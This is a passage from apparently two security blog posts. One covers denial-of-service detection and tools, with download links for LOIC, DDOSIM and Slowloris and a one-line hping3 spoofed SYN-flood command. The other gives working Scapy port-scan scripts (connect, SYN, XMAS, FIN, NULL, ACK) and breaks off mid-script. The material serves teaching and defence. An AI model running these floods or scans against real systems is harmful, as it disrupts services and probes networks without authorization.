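    """Clients with at least `threshold` half-open handshakes. Catches a
    single-host flood, but a flood that spoofs a fresh source address for
    every SYN never reaches the threshold."""
    counts = Counter(client for client, _, _, _ in pending)
    return {c for c, n in counts.items() if n >= threshold}

def suspicious_targets(pending, threshold):
    """Server ports with at least `threshold` half-open handshakes from any
    source. This view still works when the sources are spoofed."""
    counts = Counter((server, port) for _, _, server, port in pending)
    return {t for t, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    pending = track_handshakes(SAMPLE_LOG.splitlines())
    print("half-open handshakes:", len(pending))
    print("flooding sources:", suspicious_sources(pending, 5))
    print("flooded targets:", suspicious_targets(pending, 5))
```

Counting by source is enough for the single-host flood from 203.0.113.7, but the flood against port 443 uses a different (spoofed) source for every SYN and only shows up in the per-target count. That is also why the standard defence, SYN cookies (net.ipv4.tcp_syncookies on Linux), works per listening socket rather than per client. On a live Linux host, "ss -tan state syn-recv" lists the half-open connections directly.<br />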
<div style="margin-left: 35pt;">
The next question is which tools can be used to perform these attacks.</div>
<div style="margin-left: 35pt;">
If you want to check whether a website is down, you can use the following website: <a href="http://www.upordown.org/home/"><span style="color: #0563c1; text-decoration: underline;">http://www.upordown.org/home/</span></a></div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer6.png" /></div>
<div style="text-align: center;">
<strong>Figure 6 Up or Down Website Portal</strong></div>
<div style="margin-left: 35pt;">
<span style="text-decoration: underline;"><strong>Scapy</strong></span></div>
<div style="margin-left: 35pt;">
Scapy is a powerful packet manipulation tool for networks, written in Python.</div>
<div style="margin-left: 35pt;">
Scapy can forge, decode, send and capture packets, and it can also be used for scanning, tracerouting and attacking networks.</div>
<div style="margin-left: 36pt;">
It is not a dedicated DoS tool, but because it can build arbitrary packets, spoofed source addresses included, it is one of the most popular ways to craft flood traffic such as a SYN flood.</div>
<div style="margin-left: 36pt;">
<a href="http://opentechnation.blogspot.com/2016/12/scapy-all-in-one-networking-tool.html" target="_blank"> You can also check this article about Scapy</a></div>
<div style="margin-left: 36pt;">
<br /></div>
<strong>Download Scapy</strong>: https://github.com/secdev/scapy<br />
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer7.png" /></div>
<div style="text-align: center;">
<strong>Figure 7 Scapy</strong></div>
<div style="text-align: center;">
<br /></div>
<div style="margin-left: 36pt;">
<span style="text-decoration: underline;"><strong>Low Orbit Ion Cannon</strong></span></div>
<div style="margin-left: 35pt;">
Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application. <span style="background-color: white; color: black;">LOIC performs a <a href="https://en.wikipedia.org/wiki/Denial-of-service_attacks">DoS attack</a> (or, when used by many individuals at once, a DDoS attack) on a target site by flooding the server with TCP packets, UDP packets or HTTP requests. It does not spoof its source address, so each participant is easy to identify from the server logs.</span></div>
<div style="margin-left: 35pt;">
<br /></div>
<div style="margin-left: 36pt;">
<strong>Download LOIC: </strong>https://sourceforge.net/projects/loic/</div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer8.png" /></div>
<div style="text-align: center;">
<strong>Figure 8 Low Orbit Ion Cannon</strong></div>
<div style="margin-left: 36pt;">
<span style="background-color: white; color: #252525; text-decoration: underline;"><strong>Hping3</strong></span></div>
<div style="margin-left: 35pt;">
<span style="background-color: white; color: black;">Hping3 is a free packet generator and analyzer for the TCP/IP protocols. It is useful to security experts and can perform many tasks, such as idle scans, testing firewall rules, testing IDSes and also DoS attacks (for example a SYN flood with random spoofed sources: hping3 -S --flood --rand-source -p 80 target).</span></div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer9.png" /></div>
<div style="text-align: center;">
<strong>Figure 9 Hping3</strong></div>
<span style="text-decoration: underline;"><strong>DDOSIM</strong></span><br />
DDOSIM is a popular DoS attack simulator. As the name suggests, it is
used to simulate DDoS attacks by emulating several zombie hosts. All
zombie hosts create full TCP connections to the target server, which makes
it closer to a real botnet than a spoofed SYN flood.<br />
Its main features are:<br />
<ul>
<li>Simulates several zombies in attack</li>
<li>Random IP addresses</li>
<li>TCP-connection-based attacks</li>
<li>Application-layer DDOS attacks</li>
<li>HTTP DDoS with valid requests</li>
<li>HTTP DDoS with invalid requests (similar to a DC++ attack)</li>
<li>SMTP DDoS</li>
</ul>
<span style="text-decoration: underline;"><strong>Download DDOSIM</strong></span>:<span style="font-size: 10pt;"> </span><span style="color: #0563c1; text-decoration: underline;">http://sourceforge.net/projects/ddosim/</span><br />
<span style="text-decoration: underline;"><strong>Slowloris</strong></span><br />
Slowloris is a low-bandwidth HTTP DoS tool. It holds many connections open
by sending partial HTTP requests (a request line and a few headers, but never
the blank line that ends them) and keeps adding one more header every few
seconds so the server never times the sockets out. Once the server's pool of
connections is full, legitimate clients cannot connect, even though the
server itself is otherwise idle.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer10.png" /></div>
<div style="text-align: center;">
<strong>Figure 10 Slowloris</strong></div>
<strong>Download Slowloris</strong>: https://github.com/llaera/slowloris.pl<br />
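As an added example that is not part of the original post, the following Python shows the byte stream a Slowloris client feeds a server (a valid request line, then one bogus header at a time, never the blank line that ends the headers) and the server-side rule that defeats it: a deadline for completing the request headers, measured from the moment the connection was opened. The host name, timings and connection ids are constructed for the demo.<br />

```python
# Added example, not part of the original post: what a Slowloris connection
# looks like from the server side and the header-completion deadline that
# defeats it. Host name, fragment timing and connection ids are constructed.

HEADER_END = b"\r\n\r\n"   # the blank line that terminates an HTTP header block

def slowloris_fragments(host, keepalive_headers=3):
    """Yield the fragments a Slowloris client sends on one connection: a valid
    request line and Host header, then one bogus header at a time, and never
    the blank line that would let the server finish parsing the request."""
    yield b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n"
    for i in range(keepalive_headers):
        yield b"X-a: %d\r\n" % i

class ConnState:
    """What a server knows about one client socket."""
    def __init__(self, opened_at):
        self.opened_at = opened_at
        self.buf = b""
        self.header_complete = False

    def feed(self, data):
        self.buf += data
        if HEADER_END in self.buf:
            self.header_complete = True

def connections_to_drop(conns, now, header_timeout):
    """Ids of connections that have not finished their request headers within
    header_timeout seconds of being opened (the rule Apache's mod_reqtimeout
    and nginx's client_header_timeout enforce)."""
    return sorted(cid for cid, c in conns.items()
                  if not c.header_complete and now - c.opened_at > header_timeout)

def simulate(now, header_timeout, slow_clients=3, fragment_interval=10.0):
    """Replay slow_clients Slowloris connections (all opened at t=0, one
    fragment every fragment_interval seconds) next to one normal client, then
    apply the deadline at time `now`."""
    conns = {}
    for n in range(slow_clients):
        conn = ConnState(opened_at=0.0)
        for i, frag in enumerate(slowloris_fragments("www.example.com")):
            if i * fragment_interval <= now:    # only the fragments sent so far
                conn.feed(frag)
        conns["slow%d" % n] = conn
    normal = ConnState(opened_at=0.0)
    normal.feed(b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
    conns["normal"] = normal
    return connections_to_drop(conns, now, header_timeout)

if __name__ == "__main__":
    print("drop at t=25s with a 20s header deadline:", simulate(25.0, 20.0))
    print("drop at t=25s with a 30s header deadline:", simulate(25.0, 30.0))
```

Measuring from the connection's opening time is the point: Slowloris sends a few bytes just before an idle timeout would fire, so a plain idle timeout never triggers, while an absolute deadline for the whole header block does. The deadline has to be short enough to matter (with a 30 s deadline nothing is dropped at 25 s in the simulation) yet long enough for slow but honest clients.<br />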
<h1>
Conclusion</h1>
Several incidents show how powerful DDoS attacks can be:<br />
<ul>
<li><strong><em>Attack against NASDAQ</em></strong></li>
</ul>
<em>A DDoS attack caused the shutdown of the NASDAQ trading market for
more than four hours, which resulted in a $9 million fine for NASDAQ</em><br />
<ul>
<li><strong>Attack against Turkey<br />
</strong></li>
</ul>
Turkey was the victim of a large DDoS attack by Anonymous that targeted
more than 400,000 websites across all sectors, especially banks and
public institutions, and caused millions of dollars in losses.<br />
<ul>
<li><strong>Russia VS Estonia<br />
</strong></li>
</ul>
Estonia is one of the most connected countries in the world, and it was
hit by a massive DDoS attack that paralysed government, banking and media
services in waves over several weeks. The attack was widely attributed to
Russia, and it remains a well-known demonstration of the power of this kind of attack.<br />
DoS is one of the most destructive attacks on the net. The attack itself is
easy to notice, since the service stops responding, but separating flood
traffic from legitimate traffic and tracing it back to its real source is
very difficult. In the next articles, we will examine how to prevent it.</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-45156756598478534442016-12-14T00:00:00.001+05:302016-12-14T00:00:55.609+05:30Port Scanning using Scapy<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP connect scan<br />
</strong></span><br />
A TCP connect scan relies on the three-way handshake between the client and
the server: if the handshake completes, a connection has been established
and the port is open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin1.jpg" width="621" /><br />
A client trying to connect to a server on port 80 initiates the
connection by sending a TCP packet with the SYN flag set to the port it
wants to connect to (in this case port 80). If the port is open on the
server and accepting connections, it responds with a TCP packet with the
SYN and ACK flags set. A normal client would then complete the handshake
with an ACK; the script below instead answers the SYN-ACK with RST+ACK,
which tears the half-open connection down right away. Either way, a
SYN-ACK reply means the port on the server is open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin2.jpg" width="621" /><br />
The client sends the first handshake packet with the SYN flag and the port
to connect to. If the server responds with RST (RST+ACK, flags 0x14)
instead of SYN-ACK (flags 0x12), that port is closed on the server. No
response at all usually means a firewall silently dropped the probe.<br />
The code:<br />
<div>
<pre><code class="python">#! /usr/bin/env python3
# TCP connect scan of one port with Scapy (run as root; needs scapy installed)

import logging
import random
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

dst_ip = "10.0.0.1"
# Draw the source port once: RandShort() would give every packet a new
# random port, so the closing RST below would not match the probe
src_port = random.randint(1024, 65535)
dst_port = 80

# Send the SYN and wait (at most 10 s) for a single reply
tcp_connect_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="S"), timeout=10)
if tcp_connect_scan_resp is None:
    print("Filtered")        # no reply within the timeout: the probe was dropped
elif tcp_connect_scan_resp.haslayer(TCP):
    if tcp_connect_scan_resp.getlayer(TCP).flags == 0x12:      # SYN+ACK
        # Tear the half-open connection down with RST+ACK
        send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="AR"), timeout=10)
        print("Open")
    elif tcp_connect_scan_resp.getlayer(TCP).flags == 0x14:    # RST+ACK
        print("Closed")
</code></pre>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP stealth scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin3.jpg" width="621" /><br />
This technique is similar to the TCP connect scan. The client sends a
TCP packet with the SYN flag set and the port number to connect to. If
the port is open, the server responds with the SYN and ACK flags inside a
TCP packet. But this time the client answers with a bare RST in a TCP
packet and not RST+ACK, which was the case in the TCP connect scan, so the
handshake is never completed and the application listening on the port
never sees a connection. This is why it is also called a half-open or SYN
scan: it is less likely to be logged by the target application, although a
firewall or IDS that inspects SYN traffic can still detect it.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin4.jpg" width="621" /><br />
The closed port check is the same as that of the TCP connect scan. The
server responds with the RST flag set inside a TCP packet to indicate that
the port is closed on the server.<br />
The Code:<br />
<div>
<pre><code class="python">#! /usr/bin/env python3
# TCP stealth (SYN, half-open) scan of one port with Scapy (run as root)

import logging
import random
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

dst_ip = "10.0.0.1"
# Draw the source port once; RandShort() would give the RST below a
# different port from the probe
src_port = random.randint(1024, 65535)
dst_port = 80

# Send the SYN and wait (at most 10 s) for a single reply
stealth_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="S"), timeout=10)
if stealth_scan_resp is None:
    print("Filtered")        # no reply: a firewall dropped the probe
elif stealth_scan_resp.haslayer(TCP):
    if stealth_scan_resp.getlayer(TCP).flags == 0x12:      # SYN+ACK
        # Abort with a bare RST so the handshake is never completed
        send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="R"), timeout=10)
        print("Open")
    elif stealth_scan_resp.getlayer(TCP).flags == 0x14:    # RST+ACK
        print("Closed")
elif stealth_scan_resp.haslayer(ICMP):
    # ICMP destination unreachable with an administrative code: filtered
    if int(stealth_scan_resp.getlayer(ICMP).type) == 3 and int(stealth_scan_resp.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]:
        print("Filtered")
</code></pre>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>XMAS scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin5.jpg" width="621" /><br />
In the XMAS scan, a TCP packet with the PSH, FIN, and URG flags set (the
packet is "lit up like a Christmas tree"), along with the port to connect
to, is sent to the server. An open port ignores such a packet, so no
response is expected; but a firewall that drops the probe also produces no
response, which is why this result is reported as Open|Filtered rather than Open.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin6.jpg" width="621" /><br />
If the server responds with the RST flag set inside a TCP packet, the port is closed on the server. Note that some TCP stacks (Microsoft Windows among them) reply with RST to FIN, XMAS and NULL probes regardless of port state, so against those hosts every port looks closed.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin7.jpg" width="621" /><br />
If the server responds with the ICMP packet with an ICMP unreachable
error type 3 and ICMP code 1, 2, 3, 9, 10, or 13, then the port is
filtered and it cannot be inferred from the response whether the port is
open or closed.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_77213">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
</td><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">xmas_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"FPU"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(</code><code class="python functions">str</code><code class="python plain">(</code><code class="python functions">type</code><code class="python plain">(xmas_scan_resp))</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python string">"<type 'NoneType'>"</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code> <code class="python string">"Open|Filtered"</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(xmas_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(xmas_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(xmas_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(xmas_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(xmas_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
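The four scans in this post share one decision table, so here is an added example (not code from the original post) that separates the classification of a reply from the sending of the probe, covering the connect, stealth (SYN), XMAS and FIN scans described here. Scapy is used only to send; the classifier takes the TCP flag byte or the ICMP type and code as plain integers, which also makes it testable without a network. The port list and the address 10.0.0.1 are placeholders carried over from the scripts above.<br />

```python
# Added example, not part of the original post: one reply classifier shared
# by the connect, SYN (stealth), XMAS and FIN scans, written so the decision
# logic can be exercised without sending a packet. Scapy is needed only by
# scan_port(); the addresses and ports used are assumptions for the demo.
import random

try:
    from scapy.all import IP, TCP, ICMP, sr1, send, conf
    conf.verb = 0
except ImportError:            # the classifier below still works without Scapy
    IP = TCP = ICMP = None

SYN, RST, ACK = 0x02, 0x04, 0x10
SYN_ACK = SYN | ACK            # 0x12
# ICMP type 3 codes that mean a router or firewall refused to forward the probe
FILTERED_CODES = (1, 2, 3, 9, 10, 13)
PROBE_FLAGS = {"connect": "S", "syn": "S", "xmas": "FPU", "fin": "F"}

def classify(scan, tcp_flags=None, icmp=None):
    """Map one reply to a port state.
    scan:      "connect", "syn", "xmas" or "fin"
    tcp_flags: flag byte of a TCP reply, or None if no TCP reply arrived
    icmp:      (type, code) of an ICMP reply, or None"""
    if icmp is not None:
        itype, code = icmp
        return "filtered" if itype == 3 and code in FILTERED_CODES else "unknown"
    if tcp_flags is None:
        # A SYN probe is always answered (SYN+ACK or RST), so silence means a
        # filter dropped it. FIN/XMAS probes are ignored by open ports, so
        # silence there cannot separate "open" from "filtered".
        return "filtered" if scan in ("connect", "syn") else "open|filtered"
    if scan in ("connect", "syn") and (tcp_flags & SYN_ACK) == SYN_ACK:
        return "open"
    if tcp_flags & RST:
        return "closed"
    return "unknown"

def scan_port(dst_ip, dport, scan="syn", timeout=2):
    """Send one probe with Scapy (needs root) and classify the reply."""
    if IP is None:
        raise RuntimeError("scapy is not installed")
    # Draw the source port once: Scapy's RandShort() would give the closing
    # RST a different port from the probe
    sport = random.randint(1024, 65535)
    probe = IP(dst=dst_ip) / TCP(sport=sport, dport=dport, flags=PROBE_FLAGS[scan])
    resp = sr1(probe, timeout=timeout)
    if resp is None:
        return classify(scan)
    if resp.haslayer(ICMP):
        return classify(scan, icmp=(int(resp[ICMP].type), int(resp[ICMP].code)))
    if not resp.haslayer(TCP):
        return "unknown"
    state = classify(scan, tcp_flags=int(resp[TCP].flags))
    if state == "open":
        # Tear down the half-open connection: RST+ACK for the connect scan,
        # a bare RST for the stealth scan
        send(IP(dst=dst_ip) / TCP(sport=sport, dport=dport,
                                  flags="AR" if scan == "connect" else "R"))
    return state

def scan_ports(dst_ip, ports, scan="syn"):
    """Scan several ports and return {port: state}."""
    return {p: scan_port(dst_ip, p, scan) for p in ports}

if __name__ == "__main__":
    # 10.0.0.1 is the post's example address; use a host you are allowed to scan
    print(scan_ports("10.0.0.1", [22, 80, 443], scan="syn"))
```

Keeping classify() free of Scapy objects is what makes the scanner checkable: every state transition in the four diagrams above (SYN-ACK, RST, ICMP unreachable, silence) can be fed in as an integer and asserted on, and the only untested code left is the thin send-and-receive wrapper.<br />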
<span style="font-size: 14pt; text-decoration: underline;"><strong>FIN scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin8.jpg" width="621" /><br />
The FIN scan sends a TCP packet with only the FIN flag set, along with
the port number to connect to on the server. As with the XMAS scan, an
open port ignores the packet, so no response from the server means the
port is open or filtered.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin9.jpg" width="621" /><br />
If the server responds with an RST flag set in the TCP packet for the
FIN scan request packet, then the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin10.jpg" width="621" /><br />
An ICMP packet with ICMP type 3 and code 1, 2, 3, 9, 10, or 13 in
response to the FIN scan packet from the client means that the port is
filtered and the port state cannot be found.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_976094">
<table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="code"><div class="container">
<div class="line number1 index0 alt2">
<code class="python comments">#! /usr/bin/python</code></div>
<div class="line number2 index1 alt1">
</div>
<div class="line number3 index2 alt2">
<code class="python keyword">import</code> <code class="python plain">logging</code></div>
<div class="line number4 index3 alt1">
<code class="python plain">logging.getLogger(</code><code class="python string">"scapy.runtime"</code><code class="python plain">).setLevel(logging.ERROR)</code></div>
<div class="line number5 index4 alt2">
<code class="python keyword">from</code> <code class="python plain">scapy.</code><code class="python functions">all</code> <code class="python keyword">import</code> <code class="python keyword">*</code></div>
<div class="line number6 index5 alt1">
</div>
<div class="line number7 index6 alt2">
<code class="python plain">dst_ip </code><code class="python keyword">=</code> <code class="python string">"10.0.0.1"</code></div>
<div class="line number8 index7 alt1">
<code class="python plain">src_port </code><code class="python keyword">=</code> <code class="python plain">RandShort()</code></div>
<div class="line number9 index8 alt2">
<code class="python plain">dst_port</code><code class="python keyword">=</code><code class="python value">80</code></div>
<div class="line number10 index9 alt1">
</div>
<div class="line number11 index10 alt2">
<code class="python plain">fin_scan_resp </code><code class="python keyword">=</code> <code class="python plain">sr1(IP(dst</code><code class="python keyword">=</code><code class="python plain">dst_ip)</code><code class="python keyword">/</code><code class="python plain">TCP(sport</code><code class="python keyword">=</code><code class="python plain">src_port,dport</code><code class="python keyword">=</code><code class="python plain">dst_port,flags</code><code class="python keyword">=</code><code class="python string">"F"</code><code class="python plain">),timeout</code><code class="python keyword">=</code><code class="python value">10</code><code class="python plain">)</code></div>
<div class="line number12 index11 alt1">
<code class="python keyword">if</code> <code class="python plain">(fin_scan_resp </code><code class="python keyword">is</code> <code class="python keyword">None</code><code class="python plain">):</code></div>
<div class="line number13 index12 alt2">
<code class="python functions">print</code><code class="python plain">(</code><code class="python string">"Open|Filtered"</code><code class="python plain">)</code></div>
<div class="line number14 index13 alt1">
<code class="python keyword">elif</code><code class="python plain">(fin_scan_resp.haslayer(TCP)):</code></div>
<div class="line number15 index14 alt2">
<code class="python keyword">if</code><code class="python plain">(fin_scan_resp.getlayer(TCP).flags </code><code class="python keyword">=</code><code class="python keyword">=</code> <code class="python value">0x14</code><code class="python plain">):</code></div>
<div class="line number16 index15 alt1">
<code class="python functions">print</code> <code class="python string">"Closed"</code></div>
<div class="line number17 index16 alt2">
<code class="python keyword">elif</code><code class="python plain">(fin_scan_resp.haslayer(ICMP)):</code></div>
<div class="line number18 index17 alt1">
<code class="python keyword">if</code><code class="python plain">(</code><code class="python functions">int</code><code class="python plain">(fin_scan_resp.getlayer(ICMP).</code><code class="python functions">type</code><code class="python plain">)</code><code class="python keyword">=</code><code class="python keyword">=</code><code class="python value">3</code> <code class="python keyword">and</code> <code class="python functions">int</code><code class="python plain">(fin_scan_resp.getlayer(ICMP).code) </code><code class="python keyword">in</code> <code class="python plain">[</code><code class="python value">1</code><code class="python plain">,</code><code class="python value">2</code><code class="python plain">,</code><code class="python value">3</code><code class="python plain">,</code><code class="python value">9</code><code class="python plain">,</code><code class="python value">10</code><code class="python plain">,</code><code class="python value">13</code><code class="python plain">]):</code></div>
<div class="line number19 index18 alt2">
<code class="python functions">print</code> <code class="python string">"Filtered"</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>NULL scan:<br />
</strong></span><br />
<img alt="" height="276" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin11.jpg" width="618" /><br />
In a NULL scan, no flag at all is set in the TCP packet; the packet carries only the destination port number. If the server sends no response to the NULL scan packet, the port is reported as open or filtered, since a firewall that drops the probe produces the same silence as an open port.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin12.jpg" width="621" /><br />
If the server responds with the RST flag set in a TCP packet, then the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin13.jpg" width="621" /><br />
An ICMP error of type 3 and code 1, 2, 3, 9, 10, or 13 means the port is filtered on the server.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_115605">
<pre>
#! /usr/bin/python
# NULL scan of one port with scapy: send a TCP segment with no flags set
# and classify the reply the way the text above describes.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import IP, TCP, ICMP, RandShort, sr1

dst_ip = "10.0.0.1"
src_port = RandShort()   # random ephemeral source port for the probe
dst_port = 80

null_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags=""), timeout=10)
if null_scan_resp is None:
    # no reply: the port is open, or a firewall silently dropped the probe
    print("Open|Filtered")
elif null_scan_resp.haslayer(TCP):
    if null_scan_resp.getlayer(TCP).flags == 0x14:   # RST/ACK
        print("Closed")
elif null_scan_resp.haslayer(ICMP):
    icmp = null_scan_resp.getlayer(ICMP)
    if int(icmp.type) == 3 and int(icmp.code) in [1, 2, 3, 9, 10, 13]:
        print("Filtered")
</pre>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP ACK scan<br />
</strong></span><br />
The TCP ACK scan is not used to find whether a port is open or closed;
it is used to find out whether a stateful firewall is present in front of
the server. It only tells whether the port is filtered or unfiltered.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin14.jpg" width="621" /><br />
A TCP packet with the ACK flag set and the port number to probe is sent
to the server. If the server responds with a TCP packet with the RST flag
set, then the port is unfiltered and no stateful firewall is in the way.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin15.jpg" width="621" /><br />
If the server does not respond to the TCP ACK scan packet, or responds
with an ICMP error of type 3 and code 1, 2, 3, 9, 10, or 13, then the
port is filtered and a stateful firewall is present.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_111953">
<pre>
#! /usr/bin/python
# TCP ACK scan of one port with scapy: send a bare ACK and report whether
# the reply indicates a filtered or an unfiltered port.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import IP, TCP, ICMP, RandShort, sr1

dst_ip = "10.0.0.1"
src_port = RandShort()   # random ephemeral source port for the probe
dst_port = 80

